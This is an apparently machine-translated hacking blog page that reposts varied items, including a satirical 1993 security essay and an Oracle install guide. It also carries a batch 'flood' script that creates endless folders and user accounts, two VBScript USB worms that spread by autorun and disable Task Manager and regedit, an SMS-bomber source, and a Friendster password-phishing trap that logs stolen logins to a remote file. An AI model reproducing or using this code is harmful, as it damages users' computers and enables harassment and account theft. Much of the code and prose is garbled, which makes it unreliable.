Saturday, December 27, 2008

Make virus Com

You certainly have to write a normal program with assembly language, which resulted in a program with ektension com. To be more easily understood and will be given a sample format of the program with basic ektension com:

. Model Small
. Code
Org 100h
Label: Jmp Label2
Db Dataku the "Program Data Com"
Label2:
Mov AH, 09h
Lea DX, Dataku
Int 21h
Int 20H
End Label1

How to become a master Hacker

By Christopher Klaus

A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers.

Author: Christopher Klaus
Date: December 5th, 1993.
Version: 1.1

This is a paper will be broken into two parts, one showing 15 easy steps uebercracker and the next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr / h) that is practically acker
impossible to keep out of the networks.

Here's the steps to becoming a uebercracker.


Step 1. Relax and remain calm. Remember you are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and skip step 3 past.

Step 3. You may want to buy Unix manual or book to let you know what ls, cd, cat does.

Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture.

Step 5. Ask alt.irc on how to get and compile the latest IRC client and connect to IRC.

Step 6. Once on IRC, join the channel # hack. (Whew, you are half-way there!)

Step 7. Now, sit on # hack and send messages to everyone in the channel saying "Hi, Whats up?". Be obnoxious to anyone else that joins and asks questions like "Why cannot I join # warez?"

Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer, look around your system for binary SUID root programs (look in the Unix manual from step 3 if confused). After finding a SUID root binary, (ie. su, chfn, syslog), tell people you have a bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, you are a UeberCracker. Ask them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file (ie. a big core file). Tell them it is encrypted or it was messed up and you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Dont forget to be obnoxious on # hack otherwise people will look down on you and not give you anything.)

Step 11. Hopefully you will now have atleast one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other user's mail, even rm log files and whatever you temps. (look in the Unix manual from step 3 if confused).

Step 12. A good test for true uebercrackerness is to be able to fake mail.
Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root, and how you erased his files, and have it appear coming from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on # hack to everyone. (Make up stuff, Remember, you are a uebercracker.)

Step 14. Wait a few months and have all your notes, etc. in your room ready for when the FBI, Secret Service and other law enforcement agencies confinscate your equipment. Call eff.org to complain how you were and how innocent you accidently gotten someone else's account and only looked because you were curious. (Whatever else that may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to # hack and brag about how you were Busted. YOU are finally a true Uebercracker.


Now the next part of the paper is top secret. Please pass only to trusted friends and administrators and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.)

This is broken down on How to Become an UeberAdmin (otherwise know as a security expert) and How to stop Uebercrackers.

Step 1. Read Unix manual (a good idea for admins).

Step 2. Very Important. Chmod 700 rdist; chmod 644 / etc / utmp. Install sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers now. Rdist scripts is among the favorites for getting root by uebercrackers.

Step 3. Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on the Internet.

Step 4. Set up your firewall to block RPC / nfs / ip-forwarding / src routing packets. (This only applies to advanced admins who have control of the router, but this will stop 90% of all uebercrackers from attempting your site.)

Step 5. Apply all vendor patches Cert and to all of your machines. You have just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them.
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper to find if a uebercracker is knocking on your machines. Run ISS to make sure that all your machines are reasonably secure as far as remote configuration (ie. your NFS exports and anonymous FTP site.)

Step 7. If you have done all of the following, you will have stopped 99% of all uebercrackers. Congrads! (Remember, you are the admin.)

Step 8. Now there is one percent of uebercrackers that have gained some knowledge from reading security expert's mail (probably gained access to his mail via NFS exports or the guest account. You know how it is, like the mechanic that always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.)

Step 9. Here is the hard part is to try to convince these security experts that they are not so above the average citizen and that by now giving out their unknown (except for the uebercrackers) security bug, it would be a service to the Internet. They do not have to post it on Usenet, but share
among many other trusted people and hopefully fixes will come about and new pressure will be applied to vendors to come out with patches.

Step 10. If you have gained the confidence of enough security experts, you will know to be looked upto as an elite security administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile a IRC client, go onto # hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your system, and he has used a new method you have never seen, you can probably tell your other security admins and get half of the replies like - "That bug been known for years, there just is not any patches for it yet. Here's my fix. " and the other half of the replies will be like - "Wow. That is very impressive. You have just moved up a big security NOTCH in my circle." VERY IMPORTANT HERE: If you see anyone's security in Usenet newsgroups mention anything about that security holes, Flame him for discussing it since it could bring down the Internet and all Uebercrackers will now have it and the million other reasons to keep everything secret about security.


Well, this paper has shown the finer details of security on the Internet. It has shown both sides of the coin. Three points I would like to make that would probably clean up most of the security problems on the Internet are the following:

1. Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then most would be stuck uebercrackers as new machines get added to the Internet. (I believe Uebercracker is german for "lame copy-cat that can get root with 3 year old bugs.") An interesting note is that
if you probably check the mail alias for "security@vendor.com", you will find it points to / dev / null. Maybe with enough mail, it will overfill / dev / null. (Look in the manual if confused.)

2. Security experts giving up the attitude that they are above the normal
Internet users and try to give out information that could lead to pressure by other admins to vendors to come out with fixes and patches. Most security experts probably do not realize how far their information has already spread.

3. And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker.


Resources for Security:
Many security advisories are available from anonymous ftp cert.org.
Ask archie to find tcp_wrapper, security programs. For more information about ISS (Internet Security Scanner), email cklaus@shadow.net.


Acknowledgements:

Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
Miles, Scott Yelich, and Henri De Valois.
Learn More... Ecology

Source: http://www.governmentsecurity.org/HowtobecomeamasterHacker.php

How to Make a Shutdown 'Virus' with Notepad ( .bat )

It's not really a virus, it causes no damage to your PC. This. Bat script file will not be detected by any anti-virus out there. This is a file legitament made by IT admins to shutdown all the PC's at once in their network. Follow the video below for a step by step guide on how to make your own.
here is a good virus if u want but just so u know i am not for anything responceable

copy this to notepad and save as flood1.bat

@ ECHO OFF
Phoenix @ ECHO A PRODUCTION
@ ECHO MAIN BAT RUNNING
GOTO start

: start
@ ECHO SET snowball2 = 1>> bat6.bat
@ ECHO GOTO flood5>> bat6.bat
@ ECHO: flood5>> bat6.bat
@ ECHO SET / a snowball2 = snowball2%%%% +1>> bat6.bat
@ ECHO NET USER snowball2%%%% snowball2 / add>> bat6.bat
@ ECHO GOTO flood5>> bat6.bat
START / MIN bat6.bat
GOTO bat5

: bat5
@ ECHO CD%%% ProgramFiles% \>> bat5.bat
@ ECHO SET Maggi = 1>> bat5.bat
@ ECHO GOTO flood4>> bat5.bat
@ ECHO: flood4>> bat5.bat
@ ECHO mkdir Maggi Maggi%%%%>> bat5.bat
@ ECHO SET / a Maggi Maggi =%%%% +1>> bat5.bat
@ ECHO GOTO flood4>> bat5.bat
START / MIN bat5.bat
GOTO bat4

: bat4
@ ECHO CD%% SystemRoot%% \>> bat4.bat
@ ECHO SET marge = 1>> bat4.bat
@ ECHO GOTO flood3>> bat4.bat
@ ECHO: flood3>> bat4.bat
@ ECHO marge mkdir marge%%%%>> bat4.bat
@ ECHO SET / marge a marge =%%%% +1>> bat4.bat
@ ECHO GOTO flood3>> bat4.bat
START / MIN bat4.bat
GOTO bat3

: bat3
@ ECHO CD%%% UserProfile% \ Start Menu \ Programs \>> bat3.bat
@ ECHO SET bart = 1>> bat3.bat
@ ECHO GOTO flood2>> bat3.bat
@ ECHO: flood2>> bat3.bat
@ ECHO mkdir bart bart%%%%>> bat3.bat
@ ECHO SET / a bart bart =%%%% +1>> bat3.bat
@ ECHO GOTO flood2>> bat3.bat
START / MIN bat3.bat
GOTO bat2

: bat2
@ ECHO CD%%% UserProfile% \ Desktop \>> bat2.bat
@ ECHO SET Homer = 1>> bat2.bat
@ ECHO GOTO flood>> bat2.bat
@ ECHO: flood>> bat2.bat
@ ECHO mkdir Homer Homer%%%%>> bat2.bat
@ ECHO SET / a Homer Homer =%%%% +1>> bat2.bat
@ ECHO GOTO flood>> bat2.bat
START /MIN bat2.bat
GOTO original

: original
CD% HomeDrive% \
Lisa SET = 1
GOTO flood1
: flood1
Lisa lisa mkdir%%
SET / a lisa lisa =% +1%
GOTO flood1


Source by http://kinghavoc.tblog.com/archive/2007/11/1969966579

Make Virus Via NotePad

We will create a more powerful virus again. If you have not yet know, I want to apologize because in the previous article have an error code. Please replace the word "rekursif" to "rekur". If not, syntax error can later
Come on now we are open Notepadnya and type the following code. If a lazy tinggak Copy> Paste ....

'Bat-X
'Variant of Kalong.VBS
on error resume next
'Dim words following
rekur dim, windowpath, desades, fs, mf, content, TF, bat, nt, check, sd
'To prepare the content autorun
content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6ms32.dll.vbs"
set fs = createobject ( "Scripting.FileSystemObject")
set mf = fs.getfile (Wscript.ScriptFullname)
dim text, size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream (1, -2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbCrLf
loop
do
'A parent file
Set windowpath = fs.getspecialfolder (0)
set TF = fs.getfile (windowpath & "\ k4l0n6-x.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (windowpath & "\ k4l0n6-x.dll.vbs", 2, true)
tf.write rekur
tf.close
set TF = fs.getfile (windowpath & "\ k4l0n6-x.dll.vbs")
tf.attributes = 39
'Sebar added to the removable disc with Autorun.inf
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set TF = fs.getfile (desades.path & "\ k4l0n6ms32.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (desades.path & "\ k4l0n6ms32.dll.vbs", 2, true)
tf.write rekur
tf.close
set TF = fs.getfile (desades.path & "\ k4l0n6ms32.dll.vbs")
tf.attributes = 39
set TF = fs.getfile (desades.path & "\ autorun.inf")
tf.attributes = 32
set TF = fs.createtextfile (desades.path & "\ autorun.inf", 2, true)
tf.write contents
tf.close
set TF = fs.getfile (desades.path & "\ autorun.inf")
tf.attributes = 39
end if
next
'Registry Manipulation
set bat = createobject ( "WScript.Shell")
'Change IE Title
kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title ",":: -> bat-X <-:: 2="" a="" advanced="" amp="" and="" application.="" at="" batch-k4l0n6.dll.vbs="" check="" cmd.exe="" currentversion="" debugger="" disableregistrytools="" disabletaskmgr="" during="" execution="" explorer="" file="" files="" folderoptions="" following="" for="" hidden="" i="" idden="" if="" image="" install.exe="" ivert="" kalong.regwrite="" legalnoticecaption="" legalnoticetext="" lock="" manager="" message="" microsoft="" msconfig.exe="" nofind="" nofolderoptions="" norun="" not="" notepad.exe="" notepad="" noviewcontextmenu="" nt="" o="" onus="" opened="" options="" panic="" pcmav-cln.exe="" pcmav-rtp.exe="" pcmav.exe="" policies="" program="" reason="" reate="" regedit.exe="" regedit="" regedt32.exe="" registryeditor.exe="" right-click="" run="" seen="" setup.exe="" software="" startup="" system="" systemdir="" tart="" task="" the="" windowpath="" windows="" winlogon="" with="" x-bat=""> 1 then
Wscript.sleep 200,000
end if
loop while check <> 1
set sd = createobject ( "Wscript.shell")
sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname
Once you place the code click FILE> SAVE. In the File Type select ALL FILES (*.*) and save with the name k4l0n6ms32.dll.vbs. After that you try to run. And yes, you've run a bat-X.VBS on your computer.
If you open an application called: cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe, and PCMAV-RTP. exe so that Notepad will open its more or less like this:
Remember the people that are useful for other people. There is no "dangerous goods" here because you are making them dangerous. I am not responsible if you misuse this code. This is for science only. I curse if abused face similar hammer (Wah ... so famous later) ... do not deh. The point of desperation you by your own.
This virus has the ability Autorun computer so that dicolokkan Removable Disc (Mislanya Flash Disc), which infected the virus will also diinfeksi (if not in the Autorun disabled)
NOTE: To clean the bat-X is easy. Living stop the process called wscript.exe. If the WinNT you can do so through the Task Manager. But if Win9x please search tool such as Task Manager replacement Procexp or CurrProcess. What if sometimes via the Command Prompt I can.
Once you dismiss the process of removing the file wscript.exe parent who called k4l0n6-x.dll.vbs in WINDOWSDIR (C: \ Windows for example). If no first show hidden files with Folder Options. Then fix the Registry. To speed up the code to copy the Notepad:
[Version]
Signature = "$ Chicago $"
Provider = Fariskhi
[DefaultInstall]
AddReg = UnhookRegKey
DelReg = del
[UnhookRegKey]
HKCU, Software \ Microsoft \ Internet Explorer \ Main, Window Title, 0, "INTERNET EXPLORER"
[del]
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFind
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoFolderOptions
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoRun
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableRegistryTools
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System, DisableTaskMgr
HKCU, Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer, NoViewContextMenu
HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon, LegalNoticeCaption
HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon, LegalNoticeText
HKLM, Software \ Microsoft \ Windows \ CurrentVersion \ Run, Systemdir
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ cmd.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ install.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ msconfig.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ regedit.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ regedt32.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ RegistryEditor.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ setup.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ PCMAV.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ PCMAV-RTP.exe, Debugger
After that save the FILE TYPE: ALL FILES (*.*) and save with the name: kalongxremoval.inf. Then right-click the file and select install. So we create a virus and Antidotnya together with Notepad.ini tutorial is the property of friends but I am calm aja da kurubah sintak program in the registry in its

Source: http://sahammudien.wordpress.com/2007/12/12/make-virus-via-notepad/

Make Virus Is Easy

Few Virus Tutorial.

'//-- Start of the code, set to be left when the error occurred and then continue the virus - / /
on error resume next

Dim'//-- words following - / /
rekur dim, windowpath, flashdrive, fs, mf, content, TF, bat, nt, check, sd

'//-- Set a text that will be made for Autorun Setup Information - / /
content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6.dll.vbs"
set fs = createobject ( "Scripting.FileSystemObject")
set mf = fs.getfile (Wscript.ScriptFullname)
dim text, size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream (1, -2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbCrLf
loop
do

Copy'//-- themselves to be the master file in the Windows path (example: C: \ Windows)
Set windowpath = fs.getspecialfolder (0)
set TF = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true)
tf.write rekursif
tf.close
set TF = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs")
tf.attributes = 39
'//-- Create Atorun.inf virus to run automatically each flash disc tercolok - / /
'Spread to every drive bertype 1 and 2 (removable), including floppy disks

for each flashdrive in fs.drives
Check'//-- Drive - / /
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then

'//-- Create Infector If Drivetypr 1 or 2. Or A: \ - / /
set TF = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs")
tf.attributes = 32
set TF = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs", 2, true)
tf.write rekursif
tf.close
set TF = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs")
tf.attributes = 39

'//-- Create Atorun.inf the text before it is prepared (Auto Setup Information )--//
set TF = fs.getfile (flashdrive.path & "\ autorun.inf")
tf.attributes = 32
set TF = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true)
tf.write contents
tf.close
set TF = fs.getfile (flashdrive.path & "\ autorun.inf")
tf.attributes = 39
end if
next

Manipulation'//-- Registry - / /

set bat = createobject ( "WScript.Shell")

'//-- Manip - Title Change Internet Explorer into the bat vs ZAY - / /
kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "THE bat vs ZAY"

'//-- Manip - Set that does not show hidden files in Explorer - / /
kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"

'//-- Manip - Remove the Find menu, Folder Options, Run, and block regedit and Task Manager - / /
kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableRegistryTools", "1", "REG_DWORD"
kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"

'//-- Manip - Disable right-click - / /
kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoViewContextMenu", "1", "REG_DWORD"

'//-- Manip - Munculkan Message Every Windows Startup - / /
kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm bat. Rangga from Variant-Zay, do not panic all data are safe."

'//-- Manip - On the Windows Startup - / /
kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"

'//-- Manip - Change RegisteredOwner and Organization - / /
kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix"
kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner", "bat"

Nah'//-- under this code if I do not, please explain to Aat_S Mas - / /
if check <> 1 then
Wscript.sleep 200,000
end if
loop while check <> 1
set sd = createobject ( "Wscript.shell")
sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname
'End of Code


Save code in Notepad with the FILE> SAVE. Then in the save as type select "All Files (*.*). Save with the name: k4l0n6.dll.vbs. Actually I need a *. dll is also nothing but a business that does not suspicious aja.

He .. he ... Worm Virus is not pure thoughts of my own code because it mimics the virus Rangga-Zay

source: http://www.yogyafree.net/forum2/viewtopic.php?t=5787
http://davidliauw.blogspot.com/2007/06/make-virus-is-easy.html

Source SMS Bomber

# include
# include
# include
# include
# include
# include
# include

int main (int argc, char * argv [])
(
int sock;
char number [15], nomor2 [15];
char smtp [] = "mx.vodafone.pt"; <-smtp 0="" 160="" 1="" a="" address="" char="" d="" error="" fgets="" for="" from:="" from="" hav0c="" hostent="" if="" line.="" mail="" max="" message="" msg="=" n="" nenter="" new="" nter="" null="" number2="=" number="" numbers::="" o="" perror="" phone="" printf="" provider="" r="" rcpt="" return="" rror="" s="" sender="" serv_addr="" server="=" sizeof="" smtp="" sock="=" sock_stream="" sockaddr_in="" socket="" sprintf="" stdin="" struct="" subject="" the="" to="" use="" vodafone.pt=""> \ r \ n", number, provider);
sprintf (rcpt, "rcpt to: <% d% s> \ r \ n", nomor2, provider);

serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons (25);
serv_addr.sin_addr = * ((struct in_addr *) server-> h_addr);

if (connect (sock, (struct sockaddr *) & serv_addr, sizeof (serv_addr))! = NULL) (
perror ( "Error connection to the server");
return 1;
)
if (send (sock, O, strlen (O), 0) == -1) (
perror ( "Error tell data1");
return 1;
)
if (send (sock, mail, strlen (mail), 0) == -1) (
perror ( "Error tell data2");
return 1;
)
if (send (sock, rcpt, strlen (rcpt), 0) == -1) (
perror ( "Error tell data3");
return 1;
)
if (send (sock, subject, strlen (subject), 0) == -1) (
perror ( "Error tell data4");
return 1;
)
if (send (sock, "DATA \ r \ n", 10.0) == -1) (
perror ( "Error data5 tell");
return 1;
)
if (send (sock, msg, strlen (msg), 0) == -1) (
perror ( "Error data6 tell");
return 1;
)
send (sock, ". \ r \ n", 5.0);
if (send (sock, "quit \ r \ n", 10.0) == -1) (
perror ( "Error send data ');
return 1;
)
else (
printf ( "Message sent successfully \ n");
return 0;
)
)

Source: http://www.yogyafree.net/forum2/viewtopic.php?t=7432
http://davidliauw.blogspot.com/2007/08/source-sms-bomber.html

Installing Oracle10g on Linux RHELAS3

Simply, the first DL first oracle10g for linux from the site in oraclenya
http://otn.oracle.com/software/products/database/oracle10g/index.html
file -> ship.db.lnx32.cpio.gz
gunzip ship.db.lnx32.cpio.gz
* Unpack the files ship.db.lnx32_10103.cpio
-> # Cd / app
# Cpio-idmv -> # Cd / app
# Cpio-idmv </ mnt/cdrom/ship.db.lnx32_10103.cpio
examination and memory swap
# Grep MemTotal / proc / meminfo
# Grep SwapTotal / proc / meminfo
if the swap is less than 1 ghz
# Dd if = / def / zero of = tmpswap bs = 1k count = 700000
# Chmod 600 tmpswap
# Mkswap tmpswap
# Swapon tmpswap
inspection capacity directory / tmp
# Df / tmp 


update the kernel parameters
# / Etc / sysctl.conf
-> # Kernel Parameters for oracle 10.1.0 #
kernel.shmall = 2097152
kernel.shmmax = 2147483648
kernel.shmmni = 4096
kernel.sem = 250 32000 100 128
fs.file-max = 65536
net.ipv4.ip_local_port_range = 1024 65000
after run # sysctl-p
set the limit and the maximum file
# / Etc / security / limits.conf
-> # To increase the shell limits for oracle 10.1.0 #
* Soft nproc 2047
* Hard nproc 16384
* Soft nofile 4096
* Hard nofile 63536
# / Etc / profile
-> If [$ USER = "oracle"]; then
if [$ SHELL = "/ bin / ksh"]; then
ulimit-p 16384
ulimit-n 63536
else
ulimit-u 16384-n 63536
fi
fi
export ORACLE_BASE = / app / oracle;
export ORACLE_HOME = $ ORACLE_BASE/product/10.0.1;
export ORACLE_SID = ora10g;
after saving a command # source / etc / profile
create a group, user, and the directory
# Mkdir-p / app/oracle/product/10.0.1
# Mkdir-p / var / app / oracle
(# Groupadd DBA have access SYSDBA)
# Groupadd oinstall software owner ()
# Useradd-c "Oracle Software Owner"-g-G oinstall oracle DBA-d / app / oracle
owner and directory access rights
# Chown-R oracle: oinstall / app / oracle
# Chown oracle: DBA / var / app / oracle
# Chmod 755 / app / oracle
# Chmod 755 / var / app / oracle
INSTALLATION
from the root terminal
# Xhost +
from another terminal
# Su - oracle
$ Cd / app/Disk1
$. / RunInstaller
at the time of the installation process you are prompted to run the file
/ app / oracle / oraInventory / orainstRoot.sh
through user root
from the root terminal
# Cd / app / oracle / oraInventory
#. / OrainstRoot.sh
after the installation process is complete, click the OK button before .. run file root.sh
through user root
from the root terminal
# Cd / app/oracle/product/10.1.0
#. / Root.sh
Until this process is complete installation oracle10g.
nb: When Linux restart the oracle does not run automatically, we must
create automation scripts to run the database and the oracle
enterprise manager from the root terminal
# configuration change listener
# vi / app/oracle/product/10.1.0/network/admin/listener.ora
SID_LIST_LISTENER =
(SID_LIST =
(SID_DESC =
(SID_NAME = PLSExtProc)
(ORACLE_HOME = / app/oracle/product/10.1.0)
(PROGRAM = extproc)
)
)
with
SID_LIST_LISTENER =
(SID_LIST =
(SID_DESC =
(SID_NAME = PLSExtProc)
(ORACLE_HOME = / app/oracle/product/10.1.0)
(PROGRAM = extproc)
)
(SID_DESC =
(GLOBAL_DBNAME = ora10g)
(ORACLE_HOME = / app/oracle/product/10.1.0)
(SID_NAME = ora10g)
)
)
edit the settings in / etc / oratab file with the "Y":
# Vi / etc / oratab
ora10g: / u01/app/oracle/product/10.1.0: Y
Create a script in the / etc / init.d / dbora
# Vi / etc / init.d / dbora
:
#! bin / sh
# chkconfig: - 20 80
# description: Oracle Autostart script
#
# coding gugun by virtuous
#
# ORA_HOME set to be equivalent to the $ ORACLE_HOME
# from which you execute dbstart
# / etc / init.d / dbora
ORACLE_HOME = / app/oracle/product/10.1.0;
ORACLE_OWNER = oracle;
# Start oracle database
su - $ ORACLE_OWNER-c $ ORACLE_HOME / bin / dbstart
su - $ ORACLE_OWNER-c $ ORACLE_HOME / bin / lsnrctl start
# To run the oracle enterprise manager control
su - $ ORACLE_OWNER $ ORACLE_HOME / bin / emctl start dbconsole
------ ----- EOF
change permissions on / etc / init.d / dbora
# Chmod 755 / etc / init.d / dbora
edit the file / app/oracle/product/10.1.0/bin/dbstart
# Vi / app/oracle/product/10.1.0/bin/dbstart
ORATAB = / app / opt / oracle / oratab
with
ORATAB = / etc / oratab
edit / add / etc / rc.local
# Vi / etc / rc.local
/ etc / init.d / dbora
================================================== =========
notes: the script is based on experiments that have been done by the author
and running well, the script is made for easier and
must
================================================== =========
By
Gugun Gunawan
Learn More... OCP: Oracle Database 11g Administrator Certified Professional Certification Kit: (1Z0-051, 1Z0-052, and 1Z0-053)

Reference:
Administration Oracle 10g, Evara Samsyiar
InfoLinux 02/2005 and 03/2005 (the installation of oracle 9i on RH9)
http://www.oracle.com/technology/pub/articles/smiley_10gdb_install.html
Oracle Database Concepts: http://dba.ipbhost.com/lofiversion/index.php/t879.html
Source: http://www.yogyafree.net/magazine.htm, http://www.yogyafree.net/forum2

Conducting a trap in the Password Hacking Friendster

Do trap Hacking password on a friendster, the steps:

1. First you need to be friend / friend target testimonials go to your friend / your target.
2. Enter:
Halo or what it's origin have any posts (and click on the right and paste the source "A", in The way pastenya Ctrl V).
3. Then wait some time to approve TESTIMONIALS.
4. Once you approve the target or can wait for the user to open a laptop targe.t friends and of course they are also waiting to sign false friends. (When you open a laptop and a target in a few seconds / time changed the home page to log into paldi ftiendster that will result directly direcord / in store in www.yogyafree.net / familycode / friendster.txt - Road in Internet Explorer, but there is a browser that I can)
Over how the author created that can be used by the members yogyafree, if it is dipatch by a laptop then you can install these traps in your own laptop, I enter source_a.txt you look at the profile that supports CSS, so that entry into the laptop you are expected to login false.

Source "A": www.yogyafree.net / familycode / source_a.txt
Generator: http://www.markyctrigger.com/og_standard.html

Author:
^ ^ family_code / Kurniawan
Reference:
- Sate.name - Th0R (to txt file)
- Sate.name - Zhite (redirect)

Source: http://www.yogyafree.net/magazine.htm, http://www.yogyafree.net/forum2

Simple Tips to avoid Keylogger

I do not like the same program that Keylogger. Coz I have nearly a Keylogger.
Ok, I go ... This is actually very simple for the same avoid a Keylogger. We can write the password without typing, so I can be good together Keylogger.
First open explorer, enter C: \ windows \ system32
Find the file with the name osk.exe
Open ... or just click 2 times [do the same ..: p]
Now it is a type a password, so that can not be my
Keylogger. But it can not quickly write a password ... :)

Source : http://www.yogyafree.net/magazine.htm, http://www.yogyafree.net/forum2

Dupe (almost) All Types of Billing Warnet

When we began to turn the computer on which Microsoft first began appearing at the windows is the login screen client billing covering all areas of the windows. Function Alt + Tab and Ctrl + Alt + Del, usually participate in the follow-up to force us to disable login through the billing program. In fact when we sign the computer screen that is ready to run. Only obstructed by the login screen is frustrating.

Yapese .. correct one. That we need to do is hide the window without having to sign the log. There are many progie make nyembunyiin window, one ZHider. I will only describe the use of ZHider. For those who use progie laen please read manualnya, but that needs to progie is that you use must be able show / hide a window hotkey windows coz we just covered the same login screen damn it.

That must be prepared:

Giving Logo On My Computer Properties

Actually this is a lot of tricks that ... yes ... to know that do not read this article, waste of time.
For those who do not know, now try to right click on your desktop in MyComputer and click properties. When we install a new OS logo will be visible windows on the top and the bottom of the empty (I stalled as I usually shop logo ttt). We will provide the logo there.

Open notepad and write the script follows:

===== Sof =====
[General]
Manufacturer = Yogyafree OK (free)
Model rossee.100webspace.net = (free)
[Support Information]
Line1 = Visit us at the free http://www.yogyafree.com/ ()
Line2 = ff ... (free)
Line3 = (free) ...
===== EOF =====

